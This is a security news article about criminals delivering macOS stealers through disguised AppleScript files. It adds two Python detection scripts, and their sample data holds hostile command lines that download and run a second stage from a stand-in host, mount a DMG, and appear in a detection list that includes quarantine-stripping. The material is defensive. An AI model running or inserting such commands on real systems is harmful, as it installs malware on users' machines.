Security researchers are warning of a quiet but significant shift in macOS cyber-threats, as criminals repurpose AppleScript files once used mainly by state-sponsored actors. The technique, now spreading through commodity malware campaigns, is enabling stealthy infections that pose new detection challenges for Apple’s built-in defenses.
A Technique Once Used by APTs Moves Into the Criminal Mainstream
Researchers tracking macOS threat campaigns say AppleScript files with the .scpt extension—long considered a niche intrusion vector—are now appearing across a widening set of commodity malware families. The method, earlier associated with advanced persistent threat groups targeting Apple systems, is being adopted to deliver credential-stealers, fake software updates, and malicious installers disguised as ordinary documents.
Families such as MacSync and Odyssey Stealer have begun packaging payloads inside compiled AppleScript files, often delivered as what look like Zoom or Microsoft Teams update prompts. The shift follows Apple’s August 2024 move, shipped in macOS Sequoia, to remove the Control-click “Open” override that had let users launch unsigned or un-notarized software past Gatekeeper. A .scpt file sidesteps that check entirely: Script Editor is Apple’s own signed application, the script is merely a document it opens, and nothing stands between the user and the Run button. Analysts believe threat actors are experimenting with user-interaction paths like this one to get code running without triggering the usual Gatekeeper or permission prompts.
Historically, many macOS infections traveled through counterfeit Homebrew installers or disk image (DMG) files whose instructions lured users into pasting commands into Terminal. Now attackers are weaponizing .scpt files to recreate the same social-engineering pressure points in a format that looks less suspicious and sits inside macOS’s own scripting environment.
Disguised Documents, Hidden Commands
One of the most effective tactics observed in recent samples involves bundling .scpt malware inside files designed to mimic everyday office documents. Researchers have found booby-trapped copies labeled Apeiron_Token_Transfer_Proposal.docx.scpt and Stable1_Investment_Proposal.pptx.scpt, as well as fraudulent update scripts such as Zoom_SDK_Update.scpt, MSTeamsUpdate.scpt, and InstallSoftZone.scpt.
Many of these files carry a custom icon stored in the file’s resource fork, the same mechanism Finder uses for user-assigned icons, so in Finder they are indistinguishable from a real Word document, PowerPoint deck, or installer package. Double-clicking a .scpt file opens it in Script Editor by default, where the victim sees a few lines of harmless-looking comments followed by a long run of blank lines. The actual payload code is pushed far down the window, usually out of sight, so a casual glance finds nothing alarming.
Victims are then encouraged to click “Run” or press Command-R, believing they are enabling a document preview or an update. Instead the script executes a do shell script command, which hands an arbitrary command string to /bin/sh, typically a curl request that fetches a second-stage payload or launches a hidden installer.
Some samples, such as one named 888.scpt, go on to mount additional malicious DMGs, while others split payload strings across several AppleScript variables and reassemble them at run time to complicate static analysis, an evasion technique more often seen in PowerShell malware on Windows.
Detection Gaps Leave macOS Users Exposed
Despite the growing use of .scpt-based delivery, researchers say antivirus detection is inconsistent. Several live samples submitted to VirusTotal showed zero detections, underscoring how traditional signature-based tools struggle with compiled AppleScript and with the string-splitting obfuscation described above.
These limitations have created an opening for threat actors to experiment more aggressively. Analysts have also observed cross-platform behavior patterns—such as modular payload fetching, stealthy shell command execution, and staged delivery—typically associated with more mature malware ecosystems.
Security teams emphasize that monitoring processes spawned by Script Editor is critical: a do shell script call appears as a /bin/sh child of Script Editor, and a curl process beneath it should almost never occur during normal use. Unexpected network connections from that process tree and Terminal-related anomalies on macOS endpoints deserve the same attention. Endpoint telemetry showing Script Editor opening a file whose name stacks a document extension in front of .scpt, such as .docx.scpt or .pptx.scpt, should be treated as an immediate red flag.
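The process-tree and file-open checks described above, written out as detection logic. This is an added example, not code from the article or from any EDR product. The telemetry it consumes is constructed: a simplified, made-up JSON-lines shape (type, pid, ppid, path, args) standing in for what an endpoint agent would record. The facts it relies on are Script Editor’s on-disk path and that do shell script runs its command through /bin/sh; the URL, file names and staging fragments are assumptions.

```python
"""Behavioural detection of payloads launched from Script Editor.

Added example, not code from the article or from any EDR product. Telemetry
below is constructed (made-up JSON-lines shape). Real facts relied on: Script
Editor's path, and that `do shell script` runs its command through /bin/sh.
The URL, file names and staging fragments are assumptions.
"""
from __future__ import annotations

import json
import posixpath
from dataclasses import dataclass

SCRIPT_EDITOR = "/System/Applications/Utilities/Script Editor.app/Contents/MacOS/Script Editor"
SHELLS = {"/bin/sh", "/bin/bash", "/bin/zsh"}
FETCHERS = {"/usr/bin/curl"}
DOC_EXTS = (".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".pdf")
# Command-line fragments that point at second-stage staging (assumed list).
STAGING_FRAGMENTS = ("hdiutil attach", "xattr -d com.apple.quarantine", "-o /tmp/", "chmod +x /tmp/")


@dataclass(frozen=True)
class Alert:
    pid: int
    rules: tuple[str, ...]
    detail: str


def stacked_extension(name: str) -> bool:
    """report.docx.scpt -> True: a document extension masking the script extension."""
    lower = name.lower()
    if not lower.endswith((".scpt", ".applescript")):
        return False
    return lower.rsplit(".", 1)[0].endswith(DOC_EXTS)


def ancestry(procs: dict, pid: int) -> list[str]:
    """Image paths of pid's ancestors, nearest first, following the ppid links seen so far."""
    out: list[str] = []
    seen: set[int] = set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        ppid = procs[pid][0]
        if ppid not in procs:
            break
        out.append(procs[ppid][1])
        pid = ppid
    return out


def evaluate_exec(procs: dict, ev: dict) -> list[str]:
    rules: list[str] = []
    parents = ancestry(procs, ev["pid"])
    cmdline = " ".join(ev.get("args", []))
    # do shell script surfaces as /bin/sh whose parent is Script Editor itself.
    if parents and parents[0] == SCRIPT_EDITOR and ev["path"] in SHELLS:
        rules.append("script_editor_spawned_shell")
    # Anything further down that tree fetching or staging a payload is worse.
    if SCRIPT_EDITOR in parents:
        if ev["path"] in FETCHERS:
            rules.append("fetch_under_script_editor")
        if any(frag in cmdline for frag in STAGING_FRAGMENTS):
            rules.append("staging_under_script_editor")
    return rules


def detect(lines) -> list[Alert]:
    procs: dict[int, tuple[int, str]] = {}   # pid -> (ppid, image path)
    alerts: list[Alert] = []
    for raw in lines:
        if not raw.strip():
            continue
        ev = json.loads(raw)
        if ev["type"] == "exec":
            procs[ev["pid"]] = (ev["ppid"], ev["path"])
            rules = evaluate_exec(procs, ev)
            if rules:
                alerts.append(Alert(ev["pid"], tuple(rules), " ".join(ev.get("args", []))))
        elif ev["type"] == "open":
            opener = procs.get(ev["pid"], (0, ""))[1]
            if opener == SCRIPT_EDITOR and stacked_extension(posixpath.basename(ev["path"])):
                alerts.append(Alert(ev["pid"], ("stacked_extension_opened",), ev["path"]))
    return alerts


# Constructed telemetry: one lure chain under Script Editor, one benign osascript backup job.
SAMPLE_EVENTS = """
{"type":"exec","pid":501,"ppid":1,"path":"/System/Applications/Utilities/Script Editor.app/Contents/MacOS/Script Editor","args":["Script Editor"]}
{"type":"open","pid":501,"path":"/Users/alice/Downloads/Stable1_Investment_Proposal.pptx.scpt"}
{"type":"exec","pid":612,"ppid":501,"path":"/bin/sh","args":["sh","-c","curl -fsSL https://example.invalid/u -o /tmp/.u && hdiutil attach /tmp/.u"]}
{"type":"exec","pid":613,"ppid":612,"path":"/usr/bin/curl","args":["curl","-fsSL","https://example.invalid/u","-o","/tmp/.u"]}
{"type":"exec","pid":614,"ppid":612,"path":"/usr/bin/hdiutil","args":["hdiutil","attach","/tmp/.u"]}
{"type":"open","pid":501,"path":"/Users/alice/scripts/tidy_desktop.scpt"}
{"type":"exec","pid":700,"ppid":1,"path":"/usr/bin/osascript","args":["osascript","/Users/alice/scripts/backup.scpt"]}
{"type":"exec","pid":701,"ppid":700,"path":"/bin/sh","args":["sh","-c","rsync -a /Users/alice/Documents /Volumes/Backup"]}
"""

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS.splitlines()):
        print(a.pid, ",".join(a.rules), a.detail)
```

The benign osascript job spawns a shell too, but Script Editor is nowhere in its ancestry, so it produces no alert; the same shell under Script Editor does, and the curl and hdiutil grandchildren are caught by walking the parent chain rather than by looking only at the immediate parent.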
New Defensive Strategies, But an Evolving Threat
Researchers recommend several mitigation steps, beginning with changing the default handler for .scpt and .applescript files from Script Editor to a plain text editor such as TextEdit, which can display a script but has no Run button. The setting is per-user and does not stop someone from picking Script Editor from the Open With menu, so it reduces accidental execution rather than preventing it. Organizations are also writing custom endpoint detection rules that match Apple Event codes in compiled scripts, notably “sysoexec”, the eight-byte class-and-ID pair (class ‘syso’, ID ‘exec’) that is how a do shell script call is stored inside a compiled .scpt file.
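A static triage routine that puts together the tells described in the earlier section on disguised documents (stacked extensions, blank-line padding, embedded curl strings) and the “sysoexec” event-code check above. This is an added example, not code from the article or from any vendor. The sample files are constructed bytes that imitate only a header, an event code and a string literal; the “FasdUAS” magic and the “sysoexec” code are real features of compiled AppleScript, while the URL, the blank-line threshold and the file names are assumptions.

```python
"""Static triage for AppleScript document lures.

Added example, not code from the article or from any vendor. Samples are
constructed; 'FasdUAS' and 'sysoexec' are real features of compiled
AppleScript, the URL and thresholds are assumptions.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field

SCPT_MAGIC = b"FasdUAS"        # first bytes of every compiled AppleScript file
SHELL_EVENT = b"sysoexec"      # Apple Event class 'syso' + ID 'exec': how `do shell script` is stored
DOC_EXTS = (".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".pdf")
SCRIPT_EXTS = (".scpt", ".applescript")
URL_RE = re.compile(rb"(?:curl\s+-[A-Za-z]+\s+)?https?://[^\s\"']+")
BLANK_RUN = 40                 # assumed threshold for the blank-padding trick


@dataclass
class Verdict:
    name: str
    indicators: dict[str, str] = field(default_factory=dict)   # tag -> evidence

    @property
    def suspicious(self) -> bool:
        ind = set(self.indicators)
        # A stacked extension or blank padding is damning on its own. A shell
        # call alone is not (plenty of legitimate scripts use do shell script),
        # so it only counts when paired with an embedded URL.
        return "stacked_ext" in ind or "padding" in ind or {"shell", "url"} <= ind


def stacked_extension(name: str) -> bool:
    """report.docx.scpt -> True: a document extension masking the script extension."""
    lower = name.lower()
    if not lower.endswith(SCRIPT_EXTS):
        return False
    return lower.rsplit(".", 1)[0].endswith(DOC_EXTS)


def blank_padding(text: str) -> int:
    """Longest run of consecutive blank lines in a script source."""
    longest = run = 0
    for line in text.splitlines():
        run = run + 1 if line.strip() == "" else 0
        longest = max(longest, run)
    return longest


def triage(name: str, data: bytes) -> Verdict:
    v = Verdict(name)
    if stacked_extension(name):
        v.indicators["stacked_ext"] = name
    urls = URL_RE.findall(data)
    if urls:
        v.indicators["url"] = urls[0].decode(errors="replace")
    if data.startswith(SCPT_MAGIC):
        # Compiled script: event codes and string literals survive in the
        # binary even when the author never ships the source.
        if SHELL_EVENT in data:
            v.indicators["shell"] = "sysoexec event code"
    else:
        text = data.decode("utf-8", errors="replace")
        if "do shell script" in text:
            v.indicators["shell"] = "do shell script in source"
        run = blank_padding(text)
        if run >= BLANK_RUN:
            v.indicators["padding"] = f"{run} consecutive blank lines"
    return v


# Constructed samples. The compiled ones imitate only the header, an event
# code and a string literal; they are not real, runnable scripts.
LURE_COMPILED = (b"FasdUAS 1.101.10\x0e\x00\x00\x00\x04\x0f\xff\x0e\x00\x01" + b"\x00" * 16
                 + b"sysoexec" + b"\x00\x00\x00\x48"
                 + b"curl -fsSL https://example.invalid/u -o /tmp/.u && hdiutil attach /tmp/.u")
BENIGN_COMPILED = (b"FasdUAS 1.101.10\x0e\x00\x00\x00\x04\x0f\xff\x0e\x00\x01" + b"\x00" * 16
                   + b"sysoexec" + b"\x00\x00\x00\x12" + b"ls -la ~/Documents")
LURE_TEXT = ("-- Document preview helper\n-- Click Run to render the preview\n"
             + "\n" * 60
             + 'do shell script "curl -fsSL https://example.invalid/p | sh"\n').encode()

if __name__ == "__main__":
    for fname, blob in [("Apeiron_Token_Transfer_Proposal.docx.scpt", LURE_COMPILED),
                        ("tidy_desktop.scpt", BENIGN_COMPILED),
                        ("InstallSoftZone.applescript", LURE_TEXT)]:
        v = triage(fname, blob)
        print(f"{fname}: {'SUSPICIOUS' if v.suspicious else 'clean'} {v.indicators}")
```

The benign compiled sample contains sysoexec too, because do shell script is common in legitimate automation; it stays clean because nothing else supports the verdict. Note that the compiled-file checks depend on literals surviving in the binary, so a sample that splits its URL across several variables, as the article describes, will escape the URL match and must be caught by the extension, padding or behavioural checks instead.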
The broader concern, analysts say, is the convergence of scripting abuse and social engineering. As macOS threat actors borrow tactics from more mature malware ecosystems, from embedded payloads to icon spoofing and lures that avoid the now-suspicious Terminal, the old assumption that Apple systems are rarely targeted continues to erode.
For now, researchers are racing to keep pace with an increasingly sophisticated malware landscape—one in which everyday document icons may conceal some of the most quietly effective techniques seen in macOS infections to date.
